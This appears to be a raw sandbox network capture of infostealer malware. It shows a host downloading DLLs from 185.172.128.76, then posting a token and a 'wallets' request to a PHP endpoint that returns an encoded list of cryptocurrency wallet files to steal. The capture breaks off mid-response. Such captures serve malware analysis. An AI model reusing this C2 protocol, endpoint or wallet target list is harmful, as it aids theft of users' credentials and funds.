08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
Apr 26, 2024 10:27:10.394568920 CEST	94	OUT	GET /15f649199f40275b/msvcp140.dll HTTP/1.1 Host: 185.172.128.76 Cache-Control: no-cache
Apr 26, 2024 10:27:10.747078896 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 08:27:10 GMT Content-Type: application/x-msdos-program Content-Length: 450024 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "6dde8-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
Apr 26, 2024 10:27:12.110007048 CEST	90	OUT	GET /15f649199f40275b/nss3.dll HTTP/1.1 Host: 185.172.128.76 Cache-Control: no-cache
Apr 26, 2024 10:27:12.461698055 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 08:27:12 GMT Content-Type: application/x-msdos-program Content-Length: 2046288 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "1f3950-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
Apr 26, 2024 10:27:14.309087038 CEST	94	OUT	GET /15f649199f40275b/softokn3.dll HTTP/1.1 Host: 185.172.128.76 Cache-Control: no-cache
Apr 26, 2024 10:27:14.658945084 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 08:27:14 GMT Content-Type: application/x-msdos-program Content-Length: 257872 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "3ef50-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data\|@.00cfg@@.rsrc@@.reloc56@B
Apr 26, 2024 10:27:15.038606882 CEST	98	OUT	GET /15f649199f40275b/vcruntime140.dll HTTP/1.1 Host: 185.172.128.76 Cache-Control: no-cache
Apr 26, 2024 10:27:15.384238005 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 08:27:15 GMT Content-Type: application/x-msdos-program Content-Length: 80880 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "13bf0-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
Apr 26, 2024 10:27:16.551337957 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GIDHDGCBFBKECBFHCAFH Host: 185.172.128.76 Content-Length: 1067 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 10:27:16.926130056 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 08:27:16 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 10:27:17.029644966 CEST	468	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CBKJEGCBKKJECBGCGDBA Host: 185.172.128.76 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 42 4b 4a 45 47 43 42 4b 4b 4a 45 43 42 47 43 47 44 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 35 36 64 30 66 31 34 65 62 64 61 63 36 30 32 39 38 33 38 66 37 35 33 30 63 31 63 64 65 30 64 30 32 65 65 34 31 34 31 38 63 66 38 61 37 65 36 63 33 62 66 61 63 64 38 36 61 34 35 62 61 31 62 34 39 63 64 37 32 61 36 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 4a 45 47 43 42 4b 4b 4a 45 43 42 47 43 47 44 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 4a 45 47 43 42 4b 4b 4a 45 43 42 47 43 47 44 42 41 2d 2d 0d 0a Data Ascii: ------CBKJEGCBKKJECBGCGDBAContent-Disposition: form-data; name="token"256d0f14ebdac6029838f7530c1cde0d02ee41418cf8a7e6c3bfacd86a45ba1b49cd72a6------CBKJEGCBKKJECBGCGDBAContent-Disposition: form-data; name="message"wallets------CBKJEGCBKKJECBGCGDBA--
Apr 26, 2024 10:27:17.384171963 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 08:27:17 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 2408 Connection: keep-alive Vary: Accept-Encoding Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 58 45 64 79 5a 57 56 75 58 48 64 68 62 47 78 6c 64 48 4e 63 66 43 6f 75 4b 6e 77 78 66 46 64 68 63 32 46 69 61 53 42 58 59 57 78 73 5a 58 52 38 4d 58 78 63 56 32 46 73 62 47 56 30 56 32 46 7a 59 57 4a 70 58 45 4e 73 61 57 56 75 64 46 78 58 59 57 78 73 5a 58 52 7a 58 48 77 71 4c 6d 70 7a 62 32 35 38 4d 48 78 46 64 47 68 6c 63 6d 56 31 62 58 77 78 66 46 78 46 64 47 68 6c 63 6d 56 31 62 56 78 38 61 32 56 35 63 33 52 76 63 6d 56 38 4d 48 78 46 62 47 56 6a 64 48 4a 31 62 58 77 78 66 46 78 46 62 47 56 6a 64 48 4a 31 62 56 78 33 59 57 78 73 5a 58 52 7a 58 48 77 71 4c 69 70 38 4d 48 78 46 62 47 56 6a 64 48 4a 31 62 55 78 55 51 33 77 78 66 46 78 46 62 47 56 6a 64 48 4a 31 62 53 31 4d 56 45 4e 63 64 32 46 73 62 47 56 30 63 31 78 38 4b 69 34 71 66 44 42 38 52 58 68 76 5a 48 56 7a 66 44 46 38 58 45 56 34 62 32 52 31 63 31 78 38 5a 58 68 76 5a 48 56 7a 4c 6d 4e 76 62 6d 59 75 61 6e 4e 76 62 6e 77 77 66 45 56 34 62 32 52 31 63 33 77 78 66 46 78 46 65 47 39 6b 64 58 4e 63 66 48 64 70 62 6d 52 76 64 79 31 7a 64 47 46 30 5a 53 35 71 63 32 39 75 66 44 42 38 52 58 68 76 5a 48 56 7a 58 47 56 34 62 32 52 31 63 79 35 33 59 57 78 73 5a 58 52 38 4d 58 78 63 52 58 68 76 5a 48 56 7a 58 47 56 34 62 32 52 31 63 79 35 33 59 57 78 73 5a 58 52 63 66 48 42 68 63 33 4e 77 61 48 4a 68 63 32 55 75 61 6e 4e 76 62 6e 77 77 66 45 56 34 62 32 52 31 63 31 78 6c 65 47 39 6b 64 58 4d 75 64 32 46 73 62 47 56 30 66 44 46 38 58 45 56 34 62 32 52 31 63 31 78 6c 65 47 39 6b 64 58 4d 75 64 32 46 73 62 47 56 30 58 48 78 7a 5a 57 56 6b 4c 6e 4e 6c 59 32 39 38 4d 48 78 46 65 47 39 6b 64 58 4e 63 5a 58 68 76 5a 48 56 7a 4c 6e 64 68 62 47 78 6c 64 48 77 78 66 46 78 46 65 47 39 6b 64 58 4e 63 5a 58 68 76 5a 48 56 7a 4c 6e 64 68 62 47 78 6c 64 46 78 38 61 57 35 6d 62 79 35 7a 5a 57 4e 76 66 44 42 38 52 57 78 6c 59 33 52 79 62 32 34 67 51 32 46 7a 61 48 77 78 66 46 78 46 62 47 56 6a 64 48 4a 76 62 6b 4e 68 63 32 68 63 64 32 46 73 62 47 56 30 63 31 78 38 4b 69 34 71 66 44 42 38 54 58 56 73 64 47 6c 45 62 32 64 6c 66 44 46 38 58 45 31 31 62 48 52 70 52 47 39 6e 5a 56 78 38 62 58 56 73 64 47 6c 6b 62 32 64 6c 4c 6e 64 68 62 47 78 6c 64 48 77 77 66 45 70 68 65 48 67 67 52 47 56 7a 61 33 52 76 63 43 41 6f 62 32 78 6b 4b 58 77 78 66 46 78 71 59 58 68 34 58 45 78 76 59 32 46 73 49 Data Ascii: 